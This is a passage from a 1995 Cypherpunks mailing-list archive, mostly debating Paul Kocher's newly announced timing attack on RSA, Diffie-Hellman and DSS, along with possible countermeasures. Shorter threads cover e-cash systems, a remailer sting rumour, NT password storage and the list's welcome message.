ignored). PGP when used for e-mail is not vulnerable to the attack. Please state in your note whether you would like a reply. ******************************************************************** __________________________________________________________________________ Paul C. Kocher Independent cryptography/data security consultant E-mail: pck at cryptography.com (please see above before replying) From wlkngowl at unix.asb.com Sun Dec 10 22:16:16 1995 From: wlkngowl at unix.asb.com (Mutatis Mutantdis) Date: Sun, 10 Dec 95 22:16:16 PST Subject: [Mix-L] WARNING: sting via remailer! (fwd) In-Reply-To: <199512051407.JAA18236@copper.ucs.indiana.edu> Message-ID: Bryan Strawser wrote: >Forwarded message: [..] >> I was in the federal building coffee shop in Reston, Va. yesterday >> when I overheard a conversation between what appeared to be two FBI agents >> discussing a sting operation involving Mixmaster. Hearing the word >> "mixmaster" naturally caused my ears to perk up and I listened further. >> >> It appears that the FBI has coerced a mixmaster remailer operator >> into cooperating with them in a sting operation to catch remailers when >> they forward email pertaining to pornography, pedophilia, and copy-written >> software. Not that such a thing is impossible, but it seems awfully suspicious that FBI agents would be talking about a case within earshot of the general public... --Mutant Rob From wlkngowl at unix.asb.com Sun Dec 10 22:18:25 1995 From: wlkngowl at unix.asb.com (Mutatis Mutantdis) Date: Sun, 10 Dec 95 22:18:25 PST Subject: More elveator problem Message-ID: <199512110720.BAA04212@UNiX.asb.com> On Sat, 9 Dec 1995 00:23:41 -0800, Jerry Whiting wrote: >More on The Elevator Problem: >I'll confess that we're working on a new private key encryption product. Free >and clear of existing claims on intellectual property, I'd like a protocol >that answers the elevator problem: how can Alice and Bob agree on a private >key via a compromised channel? I don't want them to meet under a street lamp >and whisper in each other's ears _before_ trying to establish a secret on a >crowded elevator. [..] >Something that I neglected to mention before is that Alice and Bob do have a >unique ID within this system, not that they necessarily know each others. If >one assumes that they do, they then share a secret: the knowledge of each >other's unique ID. [..] Wait... are unique IDs secret from others? Can they share theirs with ea. other without compromising something? Maybe using a hash of their combined secret ideas (adding them, or mixing the bits... how long is the unique ID?) can be used to generate a "key" to exchange other information.... >Jerry Whiting >jwhiting at azalea.com From anonymous-remailer at shell.portal.com Sun Dec 10 22:35:59 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 10 Dec 95 22:35:59 PST Subject: *fnord* "Encryption Flaw Rattles Security Industry *fnord* Message-ID: <199512110634.WAA02690@jobe.shell.portal.com> "Encryption Flaw Rattles Comuter Security Industry" SAN FRANCISCO - The discovery of a vulvnerability has shaken the computer world's faith in the safe use of the data-security technologies on which most current and planned electronic banking, shopping and "digital cash" systems are based. The vulnerability has been found in a class of technologies known as public-key encryption - designed to provide electronic transactions by scrambling data so they can be read only by people with the proper mathematical keys to the code. The flaw was identified by Paul C. Kocher, a 22-year-old researcher, who demonstrated a way that an electronic eavesdropper who is able to monitor the repeated process of unscrambling the incoming messages could figure out the private key. It can be done by repeatedly keeping track of the precise length of time it takes to unscramble each message. --From TimesFax, Mon. Dec. 11 Internet Edition From anonymous-remailer at shell.portal.com Sun Dec 10 22:36:02 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 10 Dec 95 22:36:02 PST Subject: *fnord* "Encryption Flaw Rattles Security Industry *fnord* Message-ID: <199512110634.WAA02677@jobe.shell.portal.com> "Encryption Flaw Rattles Comuter Security Industry" SAN FRANCISCO - The discovery of a vulvnerability has shaken the computer world's faith in the safe use of the data-security technologies on which most current and planned electronic banking, shopping and "digital cash" systems are based. The vulnerability has been found in a class of technologies known as public-key encryption - designed to provide electronic transactions by scrambling data so they can be read only by people with the proper mathematical keys to the code. The flaw was identified by Paul C. Kocher, a 22-year-old researcher, who demonstrated a way that an electronic eavesdropper who is able to monitor the repeated process of unscrambling the incoming messages could figure out the private key. It can be done by repeatedly keeping track of the precise length of time it takes to unscramble each message. --From TimesFax, Mon. Dec. 11 Internet Edition From anonymous-remailer at shell.portal.com Sun Dec 10 22:40:19 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 10 Dec 95 22:40:19 PST Subject: *fnord* Addition info *fnord* Message-ID: <199512110638.WAA02958@jobe.shell.portal.com> From: pck at netcom.com (Paul C. Kocher) Subject: Announce: Timing cryptanalysis of RSA, DH, DSS Message-ID: Organization: NETCOM On-line Communication Services (408 261-4700 guest) Date: Mon, 11 Dec 1995 01:33:17 GMT Lines: 67 Sender: pck at netcom20.netcom.com I've just released details of an attack many of you will find interesting since quite a few existing cryptography products and systems are potentially at risk. The general idea of the attack is that secret keys can be found by measuring the amount of time used to to process messages. The paper describes attacks against RSA, fixed- exponent Diffie-Hellman, and DSS, and the techniques can work with many other systems as well. My research on the subject is still in progress and the current paper does not include many of my findings. I will eventually publish a full paper, but am releasing a preliminary draft now to alert the community as quickly as possible. A copy of the abstract is attached at the end of this message and the full text can be downloaded in PostScript format from: ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps.gz I've also made an HTML version which is accessible at: http://www.cryptography.com (The HTML uses subscripts and superscripts which aren't supported in older web browsers. The PostScript version is the "official" one and looks nicer.) The results have already been seen by Matt Blaze, Martin Hellman, Ron Rivest, Bruce Schneier, and many others. While the full significance of the attack is not yet known, I think everyone who has seen it considers it important (including Netscape who awarded me a $1000 bugs bounty prize). ABSTRACT. Cryptosystems often take slightly different amounts of time to process different messages. With network- based cryptosystems, cryptographic tokens, and many other applications, attackers can measure the amount of time used to complete cryptographic operations. This abstract shows that timing channels can, and often do, leak key material. The attacks are particularly alarming because they often require only known ciphertext, work even if timing measurements are somewhat inaccurate, are computationally easy, and are difficult to detect. This preliminary draft outlines attacks that can find secret exponents in Diffie- Hellman key exchange, factor RSA keys, and find DSS secret parameters. Other symmetric and asymmetric cryptographic functions are also at risk. A complete description of the attack will be presented in a full paper, to be released later. I conclude by noting that closing timing channels is often more difficult than might be expected. Cheers, Paul Kocher ********************************************************************* VERY IMPORTANT: If you send me e-mail, please understand that I probably won't have time to respond to all who write. Please keep messages SHORT and send them to pck at cryptography.com (**not** my netcom address -- misdirected messages will be ignored). PGP when used for e-mail is not vulnerable to the attack. Please state in your note whether you would like a reply. ******************************************************************** __________________________________________________________________________ Paul C. Kocher Independent cryptography/data security consultant E-mail: pck at cryptography.com (please see above before replying) ======== Xref: news2.new-york.net sci.crypt:5320 Path: news2.new-york.net!spcuna!uunet!in1.uu.net!newsfeed.internetmci.com!howland.reston.ans.net!ix.netcom.com!netnews From: jmrubin at ix.netcom.com (Joel M. Rubin) Newsgroups: sci.crypt Subject: Re: Announce: Timing cryptanalysis of RSA, DH, DSS Date: 11 Dec 1995 04:35:47 GMT Organization: Union of anti-organizationalists Lines: 11 Message-ID: <4agcf3$enr at ixnews2.ix.netcom.com> References: NNTP-Posting-Host: ix-sf17-18.ix.netcom.com X-NETCOM-Date: Sun Dec 10 8:35:47 PM PST 1995 X-Newsreader: WinVN 0.99.7 I just saw a small article with your name on page 1 of the N.Y. Times Fax 8-page Internet Edition. (Monday, December 11, 1995) They change the edition at about 10:30-11 P.M. Eastern Standard Time (0330-0400 the next GMT day) so if you read this before then, you might want to download http://nytimesfax.com/times.pdf. It is in Adobe Acrobat format. Of course, there is probably a larger article in the paper edition. ======== From: jmrubin at ix.netcom.com (Joel M. Rubin) Newsgroups: sci.crypt Subject: Re: Announce: Timing cryptanalysis of RSA, DH, DSS Date: 11 Dec 1995 04:38:58 GMT Organization: Union of anti-organizationalists Lines: 7 Message-ID: <4agcl2$enr at ixnews2.ix.netcom.com> References: NNTP-Posting-Host: ix-sf17-18.ix.netcom.com X-NETCOM-Date: Sun Dec 10 8:38:58 PM PST 1995 X-Newsreader: WinVN 0.99.7 In case you don't already know, there is an article about your work in Monday's N.Y. Times. I just read a very small version of it in http://nytimesfax.com/times.pdf. (Adobe Acrobat-format 8-page edition) The N.Y. Times Fax on the web changes edition about 10:30 or 11 P.M. New York time so if you want it, get it before then. From anonymous-remailer at shell.portal.com Sun Dec 10 22:57:51 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 10 Dec 95 22:57:51 PST Subject: Time-based cryptanalysis: How to defeat it? Message-ID: <199512110656.WAA03942@jobe.shell.portal.com> Assuming Alice is decrypting a secret message sent to her by Bob (on her very slow C64 ;), and Mallet is watching with a stopwatch in hand, hoping to determine Alice's secret key... It would be good to place inside the decryption routines a timer (WELL PLACED!) that waits a random-number of cycles (based on key-strokes, mouse position, etc.) to defeat this type of cryptanalysis? From stewarts at ix.netcom.com Sun Dec 10 23:49:59 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 10 Dec 95 23:49:59 PST Subject: More FUD from First Virtual Message-ID: <199512110750.XAA11161@ix2.ix.netcom.com> At 08:51 AM 12/10/95 -0500, Nathaniel Borenstein (Tense Hot Alien In Barn) wrote: >In any event, I could write a virus that sits in >front of the e-cash program and steals your keys when next you run the >e-cash program. Software's just too easy to fool. That's why I regard >the risk of catastrophe as being fairly large in software-based e-cash >schemes. How is this different for an ecash program vs. a First Virtual email acknowledgement program, where either a (really hairy) virus, or, more practically, an active email interloper could fake FV acks? While hardware may be the best encryption solution for the average user (as you say, and I think I agree with you), it needs to have some password interface such as a small keypad on the front of the smartcard, to prevent its usability after theft. Of course, there are problems with digicash as well; my Digicash play-money account thinks it's empty (in spite of having half a dozen coin-looking files), and doesn't recognize any of the half-dozen passwords I've guessed I might have used with it, so I'm not able to use Sameer's digicash-powered remailer. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From stewarts at ix.netcom.com Sun Dec 10 23:50:09 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 10 Dec 95 23:50:09 PST Subject: GAK and self-incrimination? Message-ID: <199512110749.XAA11099@ix2.ix.netcom.com> At 02:57 AM 12/10/95 -0800, you wrote: >The Fifth protects you against *compelled* self-incrimination - in >particular, the right to be free from the "cruel trilemma" of > > o conviction of a substantive crime, based on your > (true) testimony > o conviction of perjury, for lying when asked to incriminate > yourself > o contempt of court sanctions, for refusing to answer Testimony was often compelled by more direct means than threatened contempt citations. Piling rocks on people until they talked was still in use in the 1600s, unless I've got my dates wrong. It may have gone out of fashion slightly after witch-burning, but was still in recent cultural memory of the Constitution's authors. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From denholl at ceram.fr Mon Dec 11 02:15:55 1995 From: denholl at ceram.fr (Laurent Den-Hollander) Date: Mon, 11 Dec 95 02:15:55 PST Subject: OGY, chaotic scrambling Message-ID: <199512111014.LAA13942@mbds.ceram.fr> A few years back i ran thru a paper emanating from a navy labs researcher (i think the name was Peccora) about using synchronised chaotic signal generators as a signal scrambling/encrytpion scheme. Has there been any kind of progress in this line of work, practical applications ? Answer on C4i-pro or directly email to Denholl at ceram.fr L. Den-Hollander. OIT engineer. From Majordomo at toad.com Mon Dec 11 00:10:53 1995 From: Majordomo at toad.com (Majordomo at toad.com) Date: Mon, 11 Dec 1995 16:10:53 +0800 Subject: Welcome to cypherpunks Message-ID: <9512110810.AA08979@toad.com> -- Welcome to the cypherpunks mailing list! If you ever want to remove yourself from this mailing list, you can send mail to "Majordomo at toad.com" with the following command in the body of your email message: unsubscribe cypherpunks Cypherpunks Mailing List Here's the general information for the list you've subscribed to, in case you don't already have it: About cypherpunks ----------------- I. Administrivia (please read, boring though it may be) The cypherpunks list is a forum for discussing personal defenses for privacy in the digital domain. It is a high volume mailing list. If you don't know how to do something, like unsubscribe, send mail to majordomo at toad.com and the software robot which answers that address will send you back instructions on how to do what you want. If you don't know the majordomo syntax, an empty message to this address will get you a help file, as will a command 'help' in the body. Even with all this automated help, you may still encounter problems. If you get really stuck, please feel free to contact me directly at the address I use for mailing list management: cypherpunks-owner at toad.com Please use this address for all mailing list management issues. Hint: if you try to unsubscribe yourself from a different account than you signed up for, it likely won't work. Log back into your old account and try again. If you no longer have access to that account, mail me at the list management address above. Also, please realize that there will be some cypherpunks messages "in transit" to you at the time you unsubscribe. If you get a response that says you are unsubscribed, but the messages keep coming, wait a day and they should stop. For other questions, my list management address is not the best place, since I don't read it every day. To reach me otherwise, send mail to eric at remailer.net This address is appropriate for emergencies (and wanting to get off the list is never an emergency), such as the list continuously spewing articles. Please don't send me mail to my regular mailbox asking to be removed; I'll just send you back a form letter. Do not mail to the whole list asking to be removed. It's rude. The -request address is made exactly for this purpose. To post to the whole list, send mail to cypherpunks at toad.com If your mail bounces repeatedly, you will be removed from the list. Nothing personal, but I have to look at all the bounce messages. There is no digest version available. There is an announcements list which is moderated and has low volume. Announcements for physical cypherpunks meetings, new software and important developments will be posted there. Mail to cypherpunks-announce-request at toad.com if you want to be added or removed to the announce list. All announcements also go out to the full cypherpunks list, so there is no need to subscribe to both. II. About cypherpunks The cypherpunks list is not designed for beginners, although they are welcome. If you are totally new to crypto, please get and read the crypto FAQ referenced below. This document is a good introduction, although not short. Crypto is a subtle field and a good understanding will not come without some study. Please, as a courtesy to all, do some reading to make sure that your question is not already frequently asked. There are other forums to use on the subject of cryptography. The Usenet group sci.crypt deals with technical cryptography; cypherpunks deals with technical details but slants the discussion toward their social implications. The Usenet group talk.politics.crypto, as is says, is for political theorizing, and cypherpunks gets its share of that, but cypherpunks is all pro-crypto; the debates on this list are about how to best get crypto out there. The Usenet group alt.security.pgp is a pgp-specific group, and questions about pgp as such are likely better asked there than here. Ditto for alt.security.ripem. The cypherpunks list has its very own net.loon, a fellow named L. Detweiler. The history is too long for here, but he thinks that cypherpunks are evil incarnate. If you see a densely worded rant featuring characteristic words such as "medusa", "pseudospoofing", "treachery", "poison", or "black lies", it's probably him, no matter what the From: line says. The policy is to ignore these postings. Replies have never, ever, not even once resulted in anything constructive and usually create huge flamewars on the list. Please, please, don't feed the animals. III. Resources. A. The sci.crypt FAQ anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt The cryptography FAQ is good online intro to crypto. Very much worth reading. Last I looked, it was in ten parts. B. cypherpunks ftp site anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks This site contains code, information, rants, and other miscellany. There is a glossary there that all new members should download and read. Also recommended for all users are Hal Finney's instructions on how to use the anonymous remailer system; the remailer sources are there for the perl-literate. C. Bruce Schneier's _Applied Cryptography_, published by Wiley This is required reading for any serious technical cypherpunk. An excellent overview of the field, it describes many of the basic algorithms and protocols with their mathematical descriptions. Some of the stuff at the edges of the scope of the book is a little incomplete, so short descriptions in here should lead to library research for the latest papers, or to the list for the current thinking. All in all, a solid and valuable book. It's even got the cypherpunks-request address. IV. Famous last words My preferred email address for list maintenance topics only is hughes at toad.com. All other mail, including emergency mail, should go to hughes at ah.com, where I read mail much more regularly. Enjoy and deploy. Eric ----------------------------------------------------------------------------- Cypherpunks assume privacy is a good thing and wish there were more of it. Cypherpunks acknowledge that those who want privacy must create it for themselves and not expect governments, corporations, or other large, faceless organizations to grant them privacy out of beneficence. Cypherpunks know that people have been creating their own privacy for centuries with whispers, envelopes, closed doors, and couriers. Cypherpunks do not seek to prevent other people from speaking about their experiences or their opinions. The most important means to the defense of privacy is encryption. To encrypt is to indicate the desire for privacy. But to encrypt with weak cryptography is to indicate not too much desire for privacy. Cypherpunks hope that all people desiring privacy will learn how best to defend it. Cypherpunks are therefore devoted to cryptography. Cypherpunks wish to learn about it, to teach it, to implement it, and to make more of it. Cypherpunks know that cryptographic protocols make social structures. Cypherpunks know how to attack a system and how to defend it. Cypherpunks know just how hard it is to make good cryptosystems. Cypherpunks love to practice. They love to play with public key cryptography. They love to play with anonymous and pseudonymous mail forwarding and delivery. They love to play with DC-nets. They love to play with secure communications of all kinds. Cypherpunks write code. They know that someone has to write code to defend privacy, and since it's their privacy, they're going to write it. Cypherpunks publish their code so that their fellow cypherpunks may practice and play with it. Cypherpunks realize that security is not built in a day and are patient with incremental progress. Cypherpunks don't care if you don't like the software they write. Cypherpunks know that software can't be destroyed. Cypherpunks know that a widely dispersed system can't be shut down. Cypherpunks will make the networks safe for privacy. [Last updated Mon Feb 21 13:18:25 1994] From Majordomo at toad.com Mon Dec 11 00:11:36 1995 From: Majordomo at toad.com (Majordomo at toad.com) Date: Mon, 11 Dec 1995 16:11:36 +0800 Subject: Your Majordomo request results Message-ID: <9512110810.AA08978@toad.com> -- Your request of Majordomo was: >>>> subscribe cypherpunks Succeeded. Your request of Majordomo was: >>>> end END OF COMMANDS From SEAN at SDG.DRA.COM Mon Dec 11 00:59:51 1995 From: SEAN at SDG.DRA.COM (Sean Donelan) Date: Mon, 11 Dec 1995 16:59:51 +0800 Subject: Questions for Mark Twain Banks Message-ID: <951211023756.e5b@SDG.DRA.COM> The St. Louis Internet Users Group is doing a meeting on digital cash on Monday, Dec. 11. Since Mark Twain Banks is located in St. Louis, they've been invited to send a few speakers on the topic. Any choice questions? -- Sean Donelan, Data Research Associates, Inc, St. Louis, MO Affiliation given for identification not representation From anon-remailer at utopia.hacktic.nl Mon Dec 11 01:12:49 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Mon, 11 Dec 1995 17:12:49 +0800 Subject: Timing Cryptanalysis Attack Message-ID: <199512110845.JAA25564@utopia.hacktic.nl> pck at netcom.com (Paul C. Kocher) writes: > I've just released details of an attack many of you will > find interesting since quite a few existing cryptography > products and systems are potentially at risk. The general > idea of the attack is that secret keys can be found by > measuring the amount of time used to to process messages. I just read this paper, and while it is somewhat interesting, I don't think the walls of cryptography are in any danger of crumbling. People employing systems like PGP are already advised to use them on private machines, with only one user, and untampered-with binaries. Under such circumstances, the collecting of statistics necessary to employ a timing attack would be difficult at best, and anyone doing a "black bag" job on the platform would be better advised to use a direct attack like a passphrase-sniffer as opposed to a complex statistical approach. On Networked systems with many users, where one is advised not to decrypt with or store ones private key, the situation is of course different. But again, another user with the ability to monitor the timing of specific subroutines in ones cryptographic software or feed that software enough chosen data to generate a statistical profile of the key, would doubtless have an opportunity to compromise the system in other ways. In the particular case of RSA used to sign messages or transmit session keys, the values being exponentiated are either highly random or strongly hashed, and the opportunity of an opponent to time numerical routines with data of his own choosing is non-existant. So while this is a very nice piece of work, and certainly of theoretical interest, I don't think it will modify the way in which people are advised to utilize cryptographic software, or cause companies like Netscape of RSADSI to shed any tears. -Bourbaki 137 From eay at mincom.oz.au Mon Dec 11 01:55:55 1995 From: eay at mincom.oz.au (Eric Young) Date: Mon, 11 Dec 1995 17:55:55 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl> Message-ID: On Mon, 11 Dec 1995, Anonymous wrote: > pck at netcom.com (Paul C. Kocher) writes: > I just read this paper, and while it is somewhat interesting, I > don't think the walls of cryptography are in any danger of > crumbling. ... > So while this is a very nice piece of work, and certainly of > theoretical interest, I don't think it will modify the way in > which people are advised to utilize cryptographic software, or > cause companies like Netscape of RSADSI to shed any tears. Read the SKIP spec (SKIP is Sun's IP level encryption protocol). It uses Diffle-Hellman certificates. That means fixed secret DH keys being used in routers. It is hard to thing of a better target for this type of attack. I have not done a complete read of the SKIP specification (only a quick scan) so I could be wrong about SKIP but DH certificates sound like a very very bad idea. The other source for attack would be any networked service that is on a local network. Single user machines are far better targes than multi-user systems. That Web server sitting idle not doing much, repeatedly hit it with https requests and if you are on a local network, you should be able to get very good timing information. I for one will probably add a flag for conditional compilation of my bignumber library so that it will take constant time. This may be a %10 slow down (using small windows exponentiation) which is trivial compared to the %30 speedup I will probably get when I implement a faster mod function :-). eric -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From tomw at netscape.com Mon Dec 11 02:27:46 1995 From: tomw at netscape.com (Tom Weinstein) Date: Mon, 11 Dec 1995 18:27:46 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl> Message-ID: <30CC02F5.4487@netscape.com> Eric Young wrote: > > I for one will probably add a flag for conditional compilation of my > bignumber library so that it will take constant time. This may be a > %10 slow down (using small windows exponentiation) which is trivial > compared to the %30 speedup I will probably get when I implement a > faster mod function :-). Careful. Even if you can make the number of executed instructions the same, you still have to worry about timing differences due to branches and the way the hardware multiplier handles different operands. -- Sure we spend a lot of money, but that doesn't mean | Tom Weinstein we *do* anything. -- Washington DC motto | tomw at netscape.com From die at pig.die.com Mon Dec 11 20:15:55 1995 From: die at pig.die.com (Dave Emery) Date: Mon, 11 Dec 95 20:15:55 PST Subject: Anohter angle on timing (TEMPEST) Message-ID: <9512120332.AA05424@pig.die.com> Reading of Mr Kochers clever attack brings to mind another way of obtaining the timings it uses, particularly on smartcards and other tamper resistant hardware based crypto devices - but also perhaps on locally accessible (and poorly sheilded) servers. Observing small changes in current drain, radiated rf pulses, ground noise, noise on other pins of the device (eg a smartcard) and other kinds of transient electrical noise generated by an internal processor performing a cyrpto algorithm noise might very well allow one to quite precisely identify when certain sections or loops in the internal code of the device was running. Using this information with Kochar's statistical approach to determining bit values from time variances might make such a tempest attack on protected keys held by such a devices practical even for those of us not privy to the tricks used by the spooks to process tempest data. And it certainly could make available much more timing information per run than just the gross time to complete the crypto operation, in fact it is entirely possible that an accurate timing for each step of the algorithm could be derived from such noise measurements. Dave Emery die at die.com From eay at mincom.oz.au Mon Dec 11 20:26:50 1995 From: eay at mincom.oz.au (Eric Young) Date: Mon, 11 Dec 95 20:26:50 PST Subject: Timing Cryptanalysis Attack In-Reply-To: <199512120058.BAA25991@utopia.hacktic.nl> Message-ID: On Tue, 12 Dec 1995, Anonymous wrote: > > Timings like the ones listed are trivial to take in > > establishing things like SSL sessions, or Photuris sessions. > > The danger is to online protocols, not to PGP. > This must be a new and interesting definition of the word > "trivial" with which I was previously unfamiliar. > > Quite frankly, I would be extremely surprised if anyone mounted a > successful hostile attack against a server's RSA certificate > using timings of remotely initiated SSL sessions outside of a > controlled laboratory environment. Well lets put it this way, people have hacked machines through firewalls via IP spoofing, broken a single SSL RC4-40 bit session after weeks of CPU time, are you saying that perhaps being able to break a fixed Diffie-Hellman key on a central router/computer would not be worth trying. Remember, if you broke this key, and had recorded the last 6 months worth of traffic, you can now decode all of this traffic. Once you have that secret key and those packet logs, the decoding is a trivial and mechanical process (trust me on this one). One of the major advantages of choosing a new secret key per HD negotiation is that you loose this capacity to decrypt previous and future sessions. When we talk about taking 100s of years to factor large primes, a system that may work after a month or 2 of collecting data and statistics is definatly an easier proposition, especially when the reward is all past and future traffic. eric -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From don at wero.byu.edu Mon Dec 11 06:57:21 1995 From: don at wero.byu.edu (Don M. Kitchen) Date: Mon, 11 Dec 1995 22:57:21 +0800 Subject: [Noise] A vaguely humorous post Message-ID: <199512111002.DAA00907@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- I saw some fool posting to alt.security among other places trying to get his basic program to do OTP's. On the off chance that anybody thinks this is funny, here's my response: In-reply-to: spy at vs.spy's message of 10 Dec 1995 05:02:17 GMT Newsgroups: alt.2600,alt.2600.programz,alt.security Followup-To: alt.2600 Subject: Re: HELP....This will not work; I am perplexed. Reply-to: don at cs.byu.edu References: <4adpkp$3id at mercury.initco.net> - --text follows this line-- > 60 INPUT "HOW MANY ONE TIME PADS DO YOU WANT?";NUMB [snip] > 160 RANDOMIZE E > 170 X=INT(RND(0)*90)+1 This isn't sci.crypt so I won't flame, but I feel I should point out that "One Time Pad" is a registered trademark of Cypherpunks, Ltd, and that any inferrence that anything coming out of a basic randomizer is "One", "Time", or "Pad" is a blatent trademark violation. As a courtesy to the public, Cypherpunks, Ltd, makes freely available it's patented One Time Pad technology. Using PGP, you may enter the top-secret activation code thusly: "pgp +makerandom=[size] [filename]" where [size] is the size, in bytes, of your Cypherpunk[tm]-generated, super-cryptographically- secure, ultimate One Time Pad[tm], and [filename] is where you want it stored. You can rest assured that with your cypherpunk[tm] One-Time-Pad[tm], not even a Cypherpunk[tm] can break your code without breaking your bones. > **Have you been compromised? If the answer is no, > you had better think again. With security ideas like that, I'm not surprised. MD5 man, MD5. PS, try to zip a large output from pgp makerandom. Now try a large output from basic. Hmmmm. Which one Just Wont Compress[tm]? Happy Monday everyone. PS: got mail crypt working, it's awesome. It's quite seamless, up to the point where my home box doesn't have incoming mail service and EMACS doesn't have built in POP or IMAP. (Yet). But great for nntp and PGP. Don -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMMwBmcLa+QKZS485AQHKLAL6Ah4881dbMan91wNL2TJjvGMHe75Xwzrw YI0x5/XsmuoYv7M6qn4O+MZ9vEF51ES1sJaW5bOQ5Gq0vJn2bmGVIV+kmbn2p3TZ ZHxkv51NW7zxwRgyvnezwyYwBrY10bQ2 =eoAc -----END PGP SIGNATURE----- -- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://students.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Junk mail to root at 127.0.0.1 * This user insured by the Smith, Wesson, & Zimmermann insurance company * From owner-cypherpunks at toad.com Mon Dec 11 09:04:45 1995 From: owner-cypherpunks at toad.com (owner-cypherpunks at toad.com) Date: Tue, 12 Dec 1995 01:04:45 +0800 Subject: No Subject Message-ID: A few years back i ran thru a paper emanating from a navy labs researcher (i think the name was Peccora) about using synchronised chaotic signal generators as a signal scrambling/encrytpion scheme. Has there been any kind of progress in this line of work, practical applications ? Answer on C4i-pro or directly email to Denholl at ceram.fr L. Den-Hollander. OIT engineer. From unicorn at schloss.li Tue Dec 12 01:45:37 1995 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 12 Dec 95 01:45:37 PST Subject: Timing Cryptanalysis Attack In-Reply-To: <199512112125.QAA07753@homeport.org> Message-ID: On Mon, 11 Dec 1995, Adam Shostack wrote: > Jeff Weinstein wrote: > > | PS - I think Paul was a bit surprised when Jim Barksdale pulled > | out his wallet and handed him 10 crisp $100 bills. :-) > > Great. mention it where the IRS is sure to be listening. :) > Why would the IRS listen? Everyone knows the tax system is voluntary. > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From a.brown at nexor.co.uk Tue Dec 12 02:48:33 1995 From: a.brown at nexor.co.uk (Andy Brown) Date: Tue, 12 Dec 95 02:48:33 PST Subject: Win NT proprietary pw encryption (Was: Re: Windows .PWL cracker...) In-Reply-To: <2.2b7.32.19951211214329.002cc3a8@netcom4.netcom.com> Message-ID: <30CD5E4C.56A@nexor.co.uk> Ted Cabeen wrote: > I took a quick look in my NT registry and you can get access to the Account > Manager section of the registry by manually changing the permissions and > giving yourself access. I didn't have the time to look at all of the > entries in the registry, but there's a lot of stuff there and I wouldn't be > suprised if the encryted passwords were available. Of course, you have to > be an administrator to change the permissions, but it is possible. The encrypted passwords are in the "SECURITY" section, which the OS will not let you change the permissions to. Most user account information is available under NT via the NetUser... API functions, the passwords are not. You probably came across the settings for the Security Account Manager, not the data that it looks after. Regards, - Andy From schunter at informatik.uni-hildesheim.de Tue Dec 12 02:49:42 1995 From: schunter at informatik.uni-hildesheim.de (Matthias Schunter) Date: Tue, 12 Dec 95 02:49:42 PST Subject: e-Cash: CAFE vs. Mondex Message-ID: Dear Mr. Klur, I'm member of the CAFE consortium but I can not answer your question. As far as we know, the details of the Mondex protocols are still confidential (or only available under a non-disclosure license). However, I can give you some details about CAFE. The CAFE system is a cheque based system. This means that the customer receives an electronic chequebook, where each cheque is (blindly) signed by the bank. During each payment the customer has to use one of these signed cheques. Some of its properties are: secure Breaking the card results in a limited gain, since soon the customer will run out of cheques (Mondex' security is quite likely only based on tamper-resistance). open Due to the open public-key architecture used, the system is open, e.g., it supports multiple-issuer, multiple-currencies. One part of this openness is the public availability of the specifications. practical It provides full loss- and fault-tolerance (i.e. if you loose your wallet you're able to recover your electronic money) and supports fast micropayments (e.g., for phone ticks). privacy-protecting The privacy of the user is protected. We will soon publish our full protocol and architecture specifications. A short 50-page summary is already available (PostScript). Additional information may be found at http://www.informatik.uni-hildesheim.de/~sirene/projects/cafe/index.html Please ontact me, if you are interested in this abstract or if you have additional questions. Regards, M. Schunter --- Forwarded mail from "David Klur" Date: Mon, 11 Dec 95 12:13:48 CST From: "David Klur" To: cypherpunks at toad.com, WWW-BUYINFO at allegra.att.com Is the Cafe e-cash system different than Mondex? If so, how? Also, does anyone know when the Mondex trial will start in Delaware? ---End of forwarded mail from "David Klur" % Matthias Uni Hildesheim +49(5121)883-788 fax-732 From jirib at sweeney.cs.monash.edu.au Tue Dec 12 03:52:55 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Tue, 12 Dec 95 03:52:55 PST Subject: anti-copy In-Reply-To: <9512112112.AA03120@mercury.telecheck.com> Message-ID: <199512121152.WAA13728@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello cypherpunks at toad.com (Cypherpunks Mailing List) and turner at TeleCheck.com turner wrote: > futplex at pseudonym.com said: > >> Daark writes: How would it be possible to create files that KNOW they > >> are a copy? ... > would be to have itself figure out what track/sector it is on and inject ... Defraggers, anyone? ... > To summarize, its possible (under _some_ operating systems), but it is > not a good solution to the problem. How about if you control the operating system and everything, is it then possible to demonstrate that you don't have other copies? (Ie escrow agent is able to prove to customer that info destroyed.) Presumably this would be based on QM, EPR 'paradox' or something like that. I've read about something called "Quantum Eraser", but I don't know whether that could be used to store useful info (the vague description was from an "isn't time weird" viewpoint and erased boring stuff). Anybody better in 